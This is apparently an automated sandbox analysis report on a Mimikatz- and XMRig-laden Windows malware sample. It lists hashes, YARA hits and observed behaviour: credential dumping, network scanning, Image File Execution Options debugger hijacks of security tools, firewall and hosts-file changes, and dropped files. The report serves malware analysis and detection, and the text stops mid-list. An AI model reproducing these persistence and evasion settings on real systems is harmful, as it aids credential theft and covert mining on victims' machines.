Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28/09/2024, 09:58
Behavioral task
behavioral1
Sample
2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe
-
Size
11.1MB
-
MD5
884b10fd1f9390f450ae7e4a04e7e602
-
SHA1
e6922c1b99bbf45c606bceed3172088e9091c0ec
-
SHA256
13555e98a1cf8703fccf60326c562cfc1f0ec48e6d9454ed3dac78414ca97721
-
SHA512
100f3aff3c688ebf47814609f886becb90fb95c8de414ea9111af8e440f9d2e59ab1c1e1a48574dccfefca07b07c070c19c349d87d138b626615ae547aac943c
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3420 created 2252 3420 gzlqlcb.exe 39 -
Contacts a large (19648) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3612-176-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-180-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-197-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-210-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-219-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-230-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-244-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-251-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-272-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig behavioral2/memory/3612-382-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3828-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3828-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000800000002347a-6.dat mimikatz behavioral2/memory/3792-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1780-137-0x00007FF779F20000-0x00007FF77A00E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts gzlqlcb.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts gzlqlcb.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gzlqlcb.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1664 netsh.exe 1080 netsh.exe -
Executes dropped EXE 26 IoCs
pid Process 3792 gzlqlcb.exe 3420 gzlqlcb.exe 4808 wpcap.exe 1996 bqpfqegdw.exe 1780 vfshost.exe 4744 bbdqsyfub.exe 4472 xohudmc.exe 4436 xcllcg.exe 3612 ftfrpi.exe 4076 bbdqsyfub.exe 2128 bbdqsyfub.exe 1880 bbdqsyfub.exe 1848 bbdqsyfub.exe 1264 bbdqsyfub.exe 4500 bbdqsyfub.exe 4296 bbdqsyfub.exe 4860 bbdqsyfub.exe 1436 bbdqsyfub.exe 3760 bbdqsyfub.exe 1928 bbdqsyfub.exe 2632 bbdqsyfub.exe 3340 bbdqsyfub.exe 4124 bbdqsyfub.exe 3132 bbdqsyfub.exe 2224 gzlqlcb.exe 4896 ynqpazbis.exe -
Loads dropped DLL 12 IoCs
pid Process 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 4808 wpcap.exe 1996 bqpfqegdw.exe 1996 bqpfqegdw.exe 1996 bqpfqegdw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 76 ifconfig.me 77 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 gzlqlcb.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gzlqlcb.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\xcllcg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\xcllcg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 gzlqlcb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE gzlqlcb.exe -
resource yara_rule behavioral2/files/0x00070000000234d3-134.dat upx behavioral2/memory/1780-135-0x00007FF779F20000-0x00007FF77A00E000-memory.dmp upx behavioral2/memory/1780-137-0x00007FF779F20000-0x00007FF77A00E000-memory.dmp upx behavioral2/files/0x00070000000234de-140.dat upx behavioral2/memory/4744-141-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/4744-158-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/files/0x00070000000234db-162.dat upx behavioral2/memory/3612-163-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/4076-169-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/2128-173-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-176-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/1880-178-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-180-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/1848-183-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/1264-187-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/4500-191-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/4296-195-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-197-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/4860-200-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/1436-204-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3760-208-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-210-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/1928-213-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/2632-217-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-219-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/3340-222-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/4124-226-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3132-229-0x00007FF670F10000-0x00007FF670F6B000-memory.dmp upx behavioral2/memory/3612-230-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/3612-244-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/3612-251-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/3612-272-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx behavioral2/memory/3612-382-0x00007FF66D5D0000-0x00007FF66D6F0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\eqbflpvll\UnattendGC\specials\cnli-1.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\svschost.exe gzlqlcb.exe File opened for modification C:\Windows\ibcutqwu\svschost.xml gzlqlcb.exe File opened for modification C:\Windows\ibcutqwu\schoedcl.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\trch-1.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\docmicfg.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\docmicfg.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\Corporate\vfshost.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\posh-0.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\ucl.dll gzlqlcb.exe File created C:\Windows\ibcutqwu\vimpcsvc.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\Corporate\mimidrv.sys gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\Packet.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\tibe-2.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\upbdrjv\swrpwe.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\tucl-1.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\docmicfg.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\vimpcsvc.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\svschost.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\spoolsrv.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\schoedcl.xml gzlqlcb.exe File created C:\Windows\ibcutqwu\docmicfg.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\AppCapture64.dll gzlqlcb.exe File opened for modification C:\Windows\eqbflpvll\Corporate\log.txt cmd.exe File created C:\Windows\eqbflpvll\cqzqykzwz\ynqpazbis.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\trfo-2.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\svschost.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\AppCapture32.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\Corporate\mimilib.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\ip.txt gzlqlcb.exe File opened for modification C:\Windows\eqbflpvll\cqzqykzwz\Result.txt ynqpazbis.exe File opened for modification C:\Windows\ibcutqwu\gzlqlcb.exe 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe File created C:\Windows\eqbflpvll\UnattendGC\spoolsrv.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\Shellcode.ini gzlqlcb.exe File created C:\Windows\ibcutqwu\svschost.xml gzlqlcb.exe File created C:\Windows\ibcutqwu\schoedcl.xml gzlqlcb.exe File opened for modification C:\Windows\ibcutqwu\spoolsrv.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\exma-1.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\libeay32.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\libxml2.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe gzlqlcb.exe File opened for modification C:\Windows\ibcutqwu\vimpcsvc.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\scan.bat gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\vimpcsvc.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\schoedcl.xml gzlqlcb.exe File created C:\Windows\ime\gzlqlcb.exe gzlqlcb.exe File created C:\Windows\ibcutqwu\gzlqlcb.exe 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\crli-0.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\ssleay32.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\spoolsrv.exe gzlqlcb.exe File opened for modification C:\Windows\eqbflpvll\cqzqykzwz\Packet.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\vimpcsvc.exe gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\schoedcl.exe gzlqlcb.exe File created C:\Windows\ibcutqwu\spoolsrv.xml gzlqlcb.exe File opened for modification C:\Windows\ibcutqwu\docmicfg.xml gzlqlcb.exe File created C:\Windows\eqbflpvll\cqzqykzwz\wpcap.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\coli-0.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\xdvl-0.dll gzlqlcb.exe File created C:\Windows\eqbflpvll\UnattendGC\specials\zlib1.dll gzlqlcb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3848 sc.exe 1356 sc.exe 2220 sc.exe 4544 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 